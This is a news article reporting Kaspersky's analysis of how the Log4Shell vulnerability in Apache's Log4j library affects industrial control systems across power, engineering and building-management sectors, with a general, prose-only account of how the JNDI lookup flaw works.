Log4Shell vulnerability may have affected close to 10 percent of ICS systems globally

Log4Shell vulnerability may have affected close to 10 percent of ICS systems globally

At least one-tenth of all industrial control systems (ICS) globally may have been affected by the Log4Shell vulnerability because they use the vulnerable Java software, researchers at cybersecurity firm Kaspersky have revealed based on analysis of their telemetry data. The security firm also determined that operational technology (OT) systems appear to be almost as vulnerable as IT systems to the Log4Shell vulnerability, as evident from many vulnerability advisories recently published by vendors of ICS products. 

Apache has over the last couple of weeks released multiple updates to its Log4j library, in response to multiple vulnerabilities in its Java-based logging library used across various consumer and enterprise services, websites, applications, and OT products. The Log4Shell vulnerability was detected on Dec. 9, and other Log4j vulnerabilities have been identified. Another Log4j update has surfaced online, patching a code execution vulnerability identified in the last week of 2021. Users have now been advised to upgrade to Log4j 2.3.2 for Java 6, 2.12.4 for Java 7, or 2.17.1 for Java 8 and later.

Kaspersky said that the key issue with the Log4Shell vulnerability is the sheer scale of the problem since it affects a very large number of products to varying degrees, each in its way, identifying all vulnerable assets on a network can be a challenge, particularly in geographically distributed heterogeneous environments of large industrial organizations.

The second issue is that there isn’t a single simple solution that fits all organizations and all their vulnerable systems. While some systems may allow fast patching, many others are very hard to patch quickly and various mitigation measures have to be taken to protect them. The third issue is that this is not a vulnerability affecting a specific product or even a readily available common OEM component that is used in more or less the same ways in different end products, such as a licensing service. 

Fixing the vulnerability in the technology itself has also proved difficult, as a couple of days after the developer had released patches, a new attack vector was identified.

The Kaspersky report on the Log4Shell vulnerability in industrial enterprises also found that many of the vulnerable products are widely used in the electric power sector, including distributed control systems for power generation facilities, products for monitoring field equipment (transformers), asset management products, products used to control electric car charging stations, various products for system operators, and other supporting products, many of which can be integrated with SCADA (supervisory control and data acquisition) control system architecture.

With the Log4Shell vulnerability, the developer allows users to define what is to be logged, as well as how (in what format) and from what source the data to be logged should be taken, Kaspersky said. A Java class stored in a remote location can be used as the source of data. The class can also be looked up and found using JNDI (Java Naming and Directory Interface), a unified interface designed to work with various directory services, such as LDAP (lightweight directory access protocol), DNS (domain name system), and RMI (remote method invocation).

As a result, a malicious actor could have a specially crafted Log4j JNDI lookup string passed to a vulnerable application since it does not matter how this is done. “If the string passed contains the path to a malicious java class stored on a server controlled by the attacker, that’s all the attacker needs to ensure that the malicious code is downloaded from the server and executed in the vulnerable application’s context,” according to Kaspersky.

The Log4Shell vulnerability also significantly affects computers and organizations in engineering such as products for modeling, simulation, and collaboration of developer teams that are widely used by industrial enterprises to develop new products, as well as the PLM (product lifecycle management) and CAD/CAM systems, which are not only used to design and develop new products but also in the production process. The vulnerability also affects many building management systems, including physical security systems.

Kaspersky also believes that “many ICS may be vulnerable because of widely used common components, such as popular license management software used in many ICS products (unfortunately, product vendors have not yet released patches or security advisories and we cannot provide more details due to responsible disclosure considerations). Some Java implementations of the OPC UA protocol stack are also vulnerable,” it added.

The firm also identified that the other risk areas for OT systems that are currently hard to assess are associated with using vulnerable software which is not required for the facility’s operation and which may often be installed in violation of information security policies. It also warned about the industrial internet of things (IIoT) and smart energy applications, many of which, it turns out, were developed using vulnerable technology.

Although it is still difficult to say to what “extent vulnerable ICS systems are exposed to potential attacks, we hope that, unlike IT infrastructures, most vulnerable OT systems cannot accept inputs coming from untrusted sources,” Kaspersky said.

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related